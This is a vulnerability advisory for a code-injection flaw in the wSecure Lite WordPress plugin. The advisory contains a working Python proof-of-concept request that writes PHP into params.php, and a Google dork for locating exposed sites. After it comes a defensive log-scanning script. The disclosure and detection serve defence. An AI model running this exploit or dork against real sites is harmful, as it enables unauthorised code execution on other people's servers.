[CRITICAL] RCE vulnerability in wSecure Lite (WordPress)

in #vulnerable, 8 years ago (edited)

This vulnerability allows attackers to access the servers of all sites running wSecure version 2.3 or older with "Magic Quotes" disabled. The plugin does not need to be active. The plugin has more than 12000 downloads and 2000 active installs.
The vulnerable file is wsecure-config.php. It takes your POST data and allows executable code to be written to params.php.

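PoC in Python:
import requests
# POST fields for the plugin's config script; 'publish' carries a harmless echo "Hello!" marker
data = {'wsecure_action':'update','key':'','publish':'";\n public function __construct() { echo "Hello!"; }\n/','options':'','custom_path':'"/#"'}
# [wp-site] is a placeholder for the host being tested
site = "http://[wp-site]/wp-content/plugins/wsecure/wsecure-config.php"
res = requests.post(site, data=data)
print(res.text)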

Version: 2.3 or older
Vendor Homepage: http://www.joomlaserviceprovider.com/
Google Dork: inurl: "/wp-content/plugins/wsecure/wsecure-config.php"
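
A defender-side check for the request described above, as an added example that is not part of the original post: it scans web-server access logs for POSTs that reached wsecure-config.php and flags a params.php that contains a function definition. The combined log format, the function names, the sample log lines and the idea that a clean params.php holds only settings are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Path named in the advisory; any direct POST to it deserves review.
TARGET = "/wp-content/plugins/wsecure/wsecure-config.php"

# Common/combined log format: ip ident user [time] "METHOD uri PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) '
)

def normalise(uri):
    """Drop the query string, decode percent-encoding, collapse repeated slashes."""
    path = unquote(uri.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_config_posts(lines):
    """Return one finding per POST request that targeted the wSecure config script."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if TARGET in normalise(m["uri"]):
            findings.append({"ip": m["ip"], "time": m["time"],
                             "status": int(m["status"]),
                             # 2xx: the script ran and may have rewritten params.php
                             "executed": m["status"].startswith("2")})
    return findings

def params_looks_tampered(php_source):
    """Assumption: a clean params.php holds only settings, so any function
    definition in it is unexpected and the file should be reviewed by hand."""
    return re.search(r"\bfunction\b", php_source, re.I) is not None

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2018:10:01:02 +0000] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 200 312 "-" "python-requests/2.18.4"',
    '198.51.100.7 - - [12/Mar/2018:10:01:09 +0000] "POST /blog//wp-content/plugins/wsecure/wsecure%2Dconfig.php?x=1 HTTP/1.1" 403 199 "-" "curl/7.58.0"',
    '203.0.113.20 - - [12/Mar/2018:10:02:00 +0000] "GET /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [12/Mar/2018:10:03:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_config_posts(SAMPLE_LOG):
        print(finding)
```

A finding with "executed" set to True is the case to investigate first; since the post says the plugin does not need to be active, deactivating it is not a fix and the files have to be removed or updated.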
